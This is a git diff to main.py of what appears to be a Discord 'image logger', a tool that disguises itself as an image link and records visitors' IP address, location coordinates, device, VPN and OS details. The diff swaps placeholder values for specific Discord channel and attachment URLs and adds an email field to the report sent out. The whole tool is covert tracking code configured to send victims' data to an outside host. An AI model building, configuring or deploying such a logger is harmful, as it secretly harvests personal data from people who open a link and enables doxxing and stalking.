diff --git a/main.py b/main.py index 4a822dc..ac5f09d 100644 --- a/main.py +++ b/main.py @@ -12,8 +12,8 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", - "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument + "webhook": "https://discord.com/channels/1438896070854836438/1459684741363269713", + "image": "https://cdn.discordapp.com/attachments/1367292213532430438/1459684579664331016/Ekran_goruntusu_2026-01-02_230650.png?ex=69642cb3&is=6962db33&hm=f9dcf091cd7c463ac59ecd3861be4629b8dac58be00e68da8cc5dbbb048e083f&", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) @@ -162,6 +162,7 @@ def makeReport(ip, useragent = None, coords = None, endpoint = "N/A", url = Fals > **Mobile:** `{info['mobile']}` > **VPN:** `{info['proxy']}` > **Bot:** `{info['hosting'] if info['hosting'] and not info['proxy'] else 'Possibly' if info['hosting'] else 'False'}` +> **Mail** `{info['mail'] if info['mail'] else 'Unknown'}` **PC Info:** > **OS:** `{os}`